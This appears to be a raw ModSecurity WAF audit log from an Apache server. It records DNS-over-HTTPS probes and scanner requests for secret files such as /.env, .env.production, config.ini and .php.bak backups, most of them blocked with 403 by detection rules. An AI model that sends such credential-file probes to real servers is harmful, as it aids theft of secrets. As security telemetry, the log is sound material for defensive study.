Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744792947282450 750 (- - -) Stopwatch2: 1744792947282450 750; combined=331, p1=290, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7061af0c-Z-- --ca8b976a-A-- [16/Apr/2025:16:49:22 +0700] Z_99Ihk9XPLR9cFiTEvK4QAAABg 103.236.140.4 52404 103.236.140.4 8181 --ca8b976a-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --ca8b976a-C-- èexamplecom --ca8b976a-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca8b976a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796962765021 2816 (- - -) Stopwatch2: 1744796962765021 2816; combined=1955, p1=449, p2=1436, p3=21, p4=23, p5=25, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca8b976a-Z-- --210c4625-A-- [16/Apr/2025:16:49:23 +0700] Z_99Ixk9XPLR9cFiTEvK4gAAAAM 103.236.140.4 52410 103.236.140.4 8181 --210c4625-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --210c4625-C-- £{examplecom --210c4625-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --210c4625-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796963056845 2714 (- - -) Stopwatch2: 1744796963056845 2714; combined=1846, p1=396, p2=1380, p3=21, p4=23, p5=25, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --210c4625-Z-- --fa40566d-A-- [16/Apr/2025:16:49:23 +0700] Z_99Ixk9XPLR9cFiTEvK4wAAABQ 103.236.140.4 52416 103.236.140.4 8181 --fa40566d-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --fa40566d-C-- G examplecom --fa40566d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa40566d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796963347574 2687 (- - -) Stopwatch2: 1744796963347574 2687; combined=1835, p1=397, p2=1370, p3=20, p4=23, p5=25, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa40566d-Z-- --225f2625-A-- [16/Apr/2025:16:49:23 +0700] Z_99Ixk9XPLR9cFiTEvK5QAAAAI 103.236.140.4 52422 103.236.140.4 8181 --225f2625-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --225f2625-C-- ”Øexamplecom --225f2625-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --225f2625-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796963638769 3297 (- - -) Stopwatch2: 1744796963638769 3297; combined=2204, p1=477, p2=1643, p3=27, p4=29, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --225f2625-Z-- --de8d6117-A-- [16/Apr/2025:16:49:23 +0700] Z_99I5VnVduWmh0dMDMcDwAAAIw 103.236.140.4 52428 103.236.140.4 8181 --de8d6117-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --de8d6117-C-- ‰?examplecom --de8d6117-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --de8d6117-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796963956080 3139 (- - -) Stopwatch2: 1744796963956080 3139; combined=2114, p1=455, p2=1585, p3=20, p4=24, p5=30, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de8d6117-Z-- --07f62c7d-A-- [16/Apr/2025:16:49:24 +0700] Z_99JJVnVduWmh0dMDMcEAAAAI0 103.236.140.4 52434 103.236.140.4 8181 --07f62c7d-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --07f62c7d-C-- ñÍexamplecom --07f62c7d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --07f62c7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796964254444 2773 (- - -) Stopwatch2: 1744796964254444 2773; combined=1857, p1=407, p2=1373, p3=20, p4=23, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07f62c7d-Z-- --4fd74d5e-A-- [16/Apr/2025:16:49:24 +0700] Z_99JJVnVduWmh0dMDMcEgAAAJE 103.236.140.4 52440 103.236.140.4 8181 --4fd74d5e-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --4fd74d5e-C-- £”examplecom --4fd74d5e-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --4fd74d5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796964945648 2917 (- - -) Stopwatch2: 1744796964945648 2917; combined=1829, p1=400, p2=1350, p3=28, p4=24, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4fd74d5e-Z-- --0ada093e-A-- [16/Apr/2025:16:49:25 +0700] Z_99JRk9XPLR9cFiTEvK6wAAAAs 103.236.140.4 52446 103.236.140.4 8181 --0ada093e-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --0ada093e-C-- °Wexamplecom --0ada093e-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --0ada093e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796965989753 2908 (- - -) Stopwatch2: 1744796965989753 2908; combined=1856, p1=392, p2=1376, p3=28, p4=34, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ada093e-Z-- --528daa5a-A-- [16/Apr/2025:17:12:39 +0700] Z_-Clxk9XPLR9cFiTEvLHwAAABU 103.236.140.4 52668 103.236.140.4 8181 --528daa5a-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 147.182.149.75 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 147.182.149.75 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --528daa5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --528daa5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744798359852196 780 (- - -) Stopwatch2: 1744798359852196 780; combined=318, p1=285, p2=0, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --528daa5a-Z-- --60e1e224-A-- [16/Apr/2025:17:20:01 +0700] Z_-EUSpe92T0H9-Aa0zD4wAAAEg 103.236.140.4 52784 103.236.140.4 8181 --60e1e224-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.71.175.236 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.71.175.236 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --60e1e224-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60e1e224-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744798801979234 835 (- - -) Stopwatch2: 1744798801979234 835; combined=325, p1=292, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60e1e224-Z-- --bff99756-A-- [16/Apr/2025:18:33:35 +0700] Z_-Vjxk9XPLR9cFiTEvLUQAAABI 103.236.140.4 53264 103.236.140.4 8181 --bff99756-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 159.89.127.165 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 159.89.127.165 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --bff99756-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bff99756-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744803215623578 670 (- - -) Stopwatch2: 1744803215623578 670; combined=257, p1=220, p2=0, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bff99756-Z-- --74069e37-A-- [16/Apr/2025:18:38:53 +0700] Z_-WzZVnVduWmh0dMDMcKAAAAIU 103.236.140.4 53308 103.236.140.4 8181 --74069e37-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1 --74069e37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74069e37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744803533453999 786 (- - -) Stopwatch2: 1744803533453999 786; combined=327, p1=287, p2=0, p3=0, p4=0, p5=40, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74069e37-Z-- --9705b303-A-- [16/Apr/2025:18:38:54 +0700] Z_-WzpVnVduWmh0dMDMcKQAAAIc 103.236.140.4 53310 103.236.140.4 8181 --9705b303-B-- GET /conf/config.ini HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100 --9705b303-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9705b303-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744803534512979 2212 (- - -) Stopwatch2: 1744803534512979 2212; combined=820, p1=376, p2=417, p3=0, p4=0, p5=26, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9705b303-Z-- --9bbabf05-A-- [16/Apr/2025:18:39:04 +0700] Z_-W2Bk9XPLR9cFiTEvLWgAAAAg 103.236.140.4 53322 103.236.140.4 8181 --9bbabf05-B-- GET /configure.php.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; HTC_0PCV220/1.11.506.1 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 --9bbabf05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bbabf05-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744803544023196 1762 (- - -) Stopwatch2: 1744803544023196 1762; combined=766, p1=354, p2=386, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bbabf05-Z-- --a271fc58-A-- [16/Apr/2025:18:39:12 +0700] Z_-W4Bk9XPLR9cFiTEvLXAAAAAc 103.236.140.4 53326 103.236.140.4 8181 --a271fc58-B-- GET /config.ini.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12 --a271fc58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a271fc58-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744803552126946 1973 (- - -) Stopwatch2: 1744803552126946 1973; combined=827, p1=384, p2=414, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a271fc58-Z-- --ec251a2c-A-- [16/Apr/2025:18:39:15 +0700] Z_-W4xk9XPLR9cFiTEvLXgAAAAs 103.236.140.4 53330 103.236.140.4 8181 --ec251a2c-B-- GET /crm/.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16 --ec251a2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec251a2c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744803555349470 617 (- - -) Stopwatch2: 1744803555349470 617; combined=252, p1=218, p2=0, p3=0, p4=0, p5=33, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec251a2c-Z-- --324de545-A-- [16/Apr/2025:19:52:10 +0700] Z_-n-pVnVduWmh0dMDMoeQAAAJA 103.236.140.4 51388 103.236.140.4 8181 --324de545-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.81.12.187 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.81.12.187 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --324de545-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --324de545-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744807930865097 659 (- - -) Stopwatch2: 1744807930865097 659; combined=246, p1=213, p2=0, p3=0, p4=0, p5=33, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --324de545-Z-- --6a06bd02-A-- [16/Apr/2025:20:12:16 +0700] Z_-ssJVnVduWmh0dMDNCMQAAAIw 103.236.140.4 46732 103.236.140.4 8181 --6a06bd02-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 172.191.97.121 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 172.191.97.121 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: python-httpx/0.28.1 --6a06bd02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a06bd02-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744809136339487 731 (- - -) Stopwatch2: 1744809136339487 731; combined=310, p1=270, p2=0, p3=0, p4=0, p5=40, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a06bd02-Z-- --c01d0479-A-- [16/Apr/2025:20:25:41 +0700] Z_-v1Spe92T0H9-Aa0wBagAAAEY 103.236.140.4 47348 103.236.140.4 8181 --c01d0479-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 165.227.173.41 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 165.227.173.41 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c01d0479-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c01d0479-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744809941883798 710 (- - -) Stopwatch2: 1744809941883798 710; combined=285, p1=233, p2=0, p3=0, p4=0, p5=52, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: 